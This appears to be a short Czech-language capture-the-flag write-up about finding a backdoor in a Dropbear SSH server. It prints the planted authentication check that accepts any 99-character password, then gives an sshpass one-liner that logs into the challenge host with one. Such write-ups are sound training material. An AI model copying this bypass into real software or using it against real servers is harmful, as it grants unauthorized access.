Challenge:

Náš systémový administrátor má tušení, že použitý SSH server obsahuje backdoor. Můžete jej v přiloženém kódu najít? Když se vám to podaří, ověřte jej v praxi a získejte přístup na tento server: ssh ctf@forensic-night.cesnet.cz -p 20002 dropbear-2019.78-backdoored.tar.gz

Solution:

ll -lt ./dropbear-2019.78/ | head -n 5

if (passwordlen == 0x63 || constant_time_strcmp(testcrypt, passwdcrypt) == 0) {
    /* successful authentication */
    dropbear_log(LOG_NOTICE,
            "Password auth succeeded for '%s' from %s",
            ses.authstate.pw_name,
            svr_ses.addrstring);
    send_msg_userauth_success();
}

sshpass -p "$(python -c 'print "p" * 99')" ssh ctf@forensic-night.cesnet.cz -p 20002

FLAG:

flag{Steve_Wozniak-9338}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Challenge:

Solution:

Files

README.md

Latest commit

History

README.md

File metadata and controls

Challenge:

Solution: